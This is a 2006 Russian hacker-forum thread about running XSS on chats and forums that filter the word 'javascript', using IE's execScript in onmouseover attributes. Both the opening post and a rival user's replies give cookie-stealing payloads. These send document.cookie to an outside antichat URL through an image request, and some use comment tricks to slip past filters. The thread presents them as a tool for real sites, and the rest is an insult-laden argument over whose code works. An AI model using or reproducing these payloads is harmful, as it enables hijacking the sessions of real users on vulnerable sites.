Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Проводим XSS без javascript |
04.02.2006, 06:32
|
|
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041
Репутация:
50
|
|
Проводим XSS без javascript
Эту писанину трудно назвать статьей, она скоре является дополнением к написанному Algol'ом по XSS.
Думаю многим из вас приходилось встречать чаты/форумы/др. в которых присутвует уязвимость XSS, но провести ее сложно, по причине фильтрации магических слов javascript и vbscript, и модификации типа JaVasCriPt, javascript(с пробелами или табуляцией в начале),&#xx... и прочее не помогает. Так вот убедившись, что слово javascript наглухо фильтруется, есть возможность попробовать альтернативу execScript(это метод объекта window). Как написано в документации execScript - "Выполняет заданный сценарий".
Рассмотрим на простом примере:
Классический случай:
Код:
<font color=red onmouseover=javascript:alert()>алерт работает!</font>
Используем execScript:
Код:
<font color=red onmouseover=window.execScript(alert())>И тут работает!</font>
Эффект тот же=))
Но, видимо, популярность такого метода не такая высокая как у классического по причине есго кривости...изначально в документации синтаксис execScript выглядит так:window.execScript(выражение [,язык]), но в последних версиях IE execScript не поймет даже такую строку execScript("a=1;alert(a)"). Выяснено, что он категорически не любит пробелы кавычки и ряд других необходимых символов(например для угона кукисов).
Попробуйте:
Код:
<font color=red onmouseover=window.execScript(q="http://antichat.org/s/xex.gif?"+document.cookie)>не работает!</font>
Для решения первой проблемы(невозможность использовать несколько команд одновременно(execScript(a=1;alert(a))) мы используем следующую особенность:
Код:
<font color=red onmouseover=window.execScript(alert());window.execScript(alert())>Два алерта!</font>
т.е. через ; можем использовать несколько подряд идущих методов, что уже неплохо.
А для решения второй проблемы(его нелюбовь к кавычкам и прочим символам) используем такую замечательную вещь как функции, типа alert, eval, isNaN и возможно прочие. Из этих трех мне приглянулась isNaN. Назначение этих функций для нас не важно, вся фича в том, что эти функции неким магическим способом(кому надо сам разберется) позволяют нам творить невозможное=)
Смотрим:
Код:
<font color=red onmouseover=window.execScript(isNaN(q="http://antichat.org/s/we.gif?"+document.cookie));window.execScript(alert(q))>Получилось!</font>
Т.е. мы решили вторую проблему, таким образом мы создаем полноценную "куки-тырилку", несмотря на паранойю разработчика=))
P.S.Возможно это уже где-то описывалось, не встречал.
P.S.S.За всеми вопросами пишем сюда... |
|
|
04.02.2006, 06:42
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
Провел на форуме:
427901
Репутация:
23
|
|
прикольно ! тоже самое можно сделать и на vbs
cool
Последний раз редактировалось lexa; 04.02.2006 в 07:04..
|
|
|
|
04.02.2006, 07:50
|
|
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
Провел на форуме:
4349433
Репутация:
661
|
|
гыг.. ша испытаем в полевых условиях...
--------------------------------------
не уверен, но кажися я подоное где-то уже видел 
Последний раз редактировалось A110ut; 04.02.2006 в 07:56..
|
|
|
|
04.02.2006, 10:50
|
|
Новичок
Регистрация: 29.07.2005
Сообщений: 20
Провел на форуме:
357093
Репутация:
13
|
|
А нах этот гемор.
<font color=red onmouseover=javascript:alert()>алерт работает!</font>
Можно просто
<font color=red onmouseover=alert()>алерт работает!</font>
потому что события и так обрабтываются javascript`oм.
|
|
|
|
04.02.2006, 11:16
|
|
Banned
Регистрация: 04.02.2006
Сообщений: 20
Провел на форуме:
19546
Репутация:
1
|
|
Автор спасибо тебе большое! Я давно так не смеялся!
Во-первых код который ты дал для воровки кук работать не будет, будет только алерт твоего скрипта воровки кук лол.
Дальше, научись писать ок? тогда все у тебя будет работать.
Алерт во всех браузерах.
Код HTML:
<font color=red onmouseover=window.execScript("a=1;alert(a)")>И тут работает!</font>
Воровка кук во всех браузерах.
Код HTML:
<font color=red onmouseover=window.execScript("img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")>Получилось!</font>
А так уже все? "Прикрыли" да?
Код HTML:
<font color=red onmouseover=a=1;alert(a)>И тут работает!</font>
Код HTML:
<font color=red onmouseover=img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>Получилось!</font>
Или ты просто написал для выкрутасывания?
Ну можно тогда повыкрутасыватся и вот так воть,
Код HTML:
<font color=red onmouseover=img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;eval(img);>Получилось!</font>
Во-общем пиши побольше статей, в разделе юмор качественных таких вот статейяк которые являются статейками продолжениями статей Алгола - мало.
Последний раз редактировалось Victor; 04.02.2006 в 11:19..
|
|
|
|
04.02.2006, 12:08
|
|
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041
Репутация:
50
|
|
To Victor: ошибаешься, все что ты написал, должен знать любой...я считаю это базисом и не посчитал нужным расписывать...
P.S>процитируцй над чем ты смеялся...
|
|
|
|
04.02.2006, 12:11
|
|
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041
Репутация:
50
|
|
Сообщение от K[o]S
А нах этот гемор.
<font color=red onmouseover=javascript:alert()>алерт работает!</font>
Можно просто
<font color=red onmouseover=alert()>алерт работает!</font>
потому что события и так обрабтываются javascript`oм.
Это условности...повторюсь, кому надо тот код сам допишет, здесь только идея...
|
|
|
|
04.02.2006, 12:39
|
|
Banned
Регистрация: 04.02.2006
Сообщений: 20
Провел на форуме:
19546
Репутация:
1
|
|
Сообщение от Xex
To Victor: ошибаешься, все что ты написал, должен знать любой...я считаю это базисом и не посчитал нужным расписывать...
P.S>процитируцй над чем ты смеялся...
Над тем как ты пишешь свои коды которые не работают лол.
Код HTML:
<font color=red onmouseover=window.execScript(isNaN(q="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie));window.execScript(alert(q))>Получилось!</font>
Вот так допустим все что будет работать, так это алерт который будет орать
И не болие.
Эту писанину трудно назвать статьей, она скоре является дополнением к написанному Algol'ом по XSS.
Тут Я упал.
Но, видимо, популярность такого метода не такая высокая как у классического по причине есго кривости...
Имхо ну что ты мелешь....JavaScript это вообще протокол, execScript это метод переходить c одного языка на другой.
Выяснено, что он категорически не любит пробелы кавычки и ряд других необходимых символов(например для угона кукисов).
Да не он не любит, а ты не правильно пишешь.
Код HTML:
<font color=red onmouseover=window.execScript(q="http://antichat.org/s/xex.gif?"+document.cookie)>не работает!</font>
И почему это должно работать? О_О
Мда, короче мда, дальше цитировать думаю не стоит.
|
|
|
|
04.02.2006, 12:59
|
|
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041
Репутация:
50
|
|
Сообщение от Victor
Над тем как ты пишешь свои коды которые не работают лол..
Все тама работает, руки проверь...
Сообщение от Victor
Вот так допустим все что будет работать, так это алерт который будет орать
И не болие.
Рад за тебя, что ты алерт, от всегоотсального отличаешь....
Сообщение от Victor
....JavaScript это вообще протокол, execScript это метод переходить c одного языка на другой.
И что мне мешает использовать его нестандартно?
Сообщение от Victor
Да не он не любит, а ты не правильно пишешь.
И почему это должно работать? О_О
Бред...Желание до*б*атся...
To Victor:если хочется похамится пиши в пм, не засоряем...
Последний раз редактировалось Xex; 04.02.2006 в 13:04..
|
|
|
|
04.02.2006, 13:13
|
|
Banned
Регистрация: 04.02.2006
Сообщений: 20
Провел на форуме:
19546
Репутация:
1
|
|
Сообщение от Xex
Все тама работает, руки проверь...
Рад за тебя, что ты алерт, от всегоотсального отличаешь....
И что мне мешает использовать его нестандартно?
Бред...Желание до*б*атся...
Мда.....у тебя код воровки кук не может работать и не работает. Проверь для начала. Во-первых по какому принципу он будет у тебя работать? Ты у кого статью спер признавайся нука быстро....
Рад за тебя, что ты алерт, от всегоотсального отличаешь....
Мда, все что Я говорил ты просто забыл и тему сменил.
У тебя алерт есть, но кук воровки быть не может в твоем коде.
И что мне мешает использовать его нестандартно?
Как понять нестандартно? о_О
Так вот убедившись, что слово javascript наглухо фильтруется, есть возможность попробовать альтернативу execScript
Ответ,
Имхо ну что ты мелешь....JavaScript это вообще протокол, execScript это метод переходить c одного языка на другой.
Слова выбирай и кончай курить.
Бред...Желание до*б*атся...
Вот Я тоже подумал когда статью твою прочел. Еще на меня смех напал.
Короче не смеши гусей, Я написал тебе готовые коды как правильно писать надо, что ты сейчас хочешь выяснить Я не понимаю.....
Статья = бред.
Код воровки кук у тебя не работает и не может работать.
Эту писанину трудно назвать статьей, она скоре является дополнением к написанному Algol'ом по XSS.
Это Я сую в свою подпись.
Последний раз редактировалось Victor; 04.02.2006 в 13:16..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K[o]S](/avatars/avatar18223.gif){kind=avatar}
Похожие темы
Линейный вид
